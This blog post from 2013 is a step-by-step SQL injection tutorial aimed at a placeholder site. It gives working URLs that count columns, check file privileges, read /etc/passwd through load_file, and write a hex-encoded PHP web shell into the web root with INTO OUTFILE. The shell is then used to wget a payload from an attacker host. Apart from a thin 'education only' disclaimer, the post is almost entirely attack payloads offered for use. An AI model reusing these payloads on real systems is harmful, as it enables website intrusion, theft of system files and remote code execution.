Monday, April 29, 2013

sql injection into outfile step by step (upload shell via sql injection)

Posted by Unknown Posted on 10:58 AM 6 comments


I make this article for education purpose only, and I'm not responsibility for any damage caused by reader do. ok I gues you was have a target with sql injection vulnerability.now follow my instruction. for example I use "http://target.com/index.php?id=5"

ok first we should know number of columns where we will inject our code. use "order by" command to find it. 
 http://target.php?id=5 order by 1,2,3,4,5,6,7,8--
ok it stop at '8' ... and I use "UNION SELECT" and got number '5'

if we want to load or write we must check file privilege... if we see 'Y' it mean we have permision to load and write. this how to check file_priv
http://target.php?id=-5+UNION+SELECT+1,2,3,4,file_priv,6,7,8+from+mysql.user--
next we will try to load a file from directory.
 http://target.php?id=-5+UNION+SELECT+1,2,3,4,load_file('/etc/passwd'),6,7,8--
or you can convert into hex like this :
 http://target.php?id=-5+UNION+SELECT+1,2,3,4,load_file(0x2f6574632f706173737764),6,7,8--
 and we will see result of 'etc/passwd' it contains some code like "root:x:0:0:bla:bla:bla...

ok next we must found the directory, many site show the directory in the error page.. but some web not show it. for example I got this directory '/var/www/site.com/config.php' .
now I will try to upload my shell on this directory ... I try to write and into outfile to upload my shell, this is what I want to upload :<?include($_GET["cmd']);?> but before I upload it I will convert it into hex it look like this after converting : 3c3f696e636c75646528245f4745545b22636d64225d293b3f3e
http://target.php?id=-5+UNION+SELECT+1,2,3,4,0x3c3f696e636c75646528245f4745545b22636d64225d293b3f3e,6,7,8+INTO+OUTFILE+'/var/www/site/shell.php'--
and bingo we was upload our shell. and open the shell 
 http://target.com/shell.php?cmd=wget http://hackersite/devil.txt 
Categories:

6 comments:

Subscribe to: Post Comments (Atom)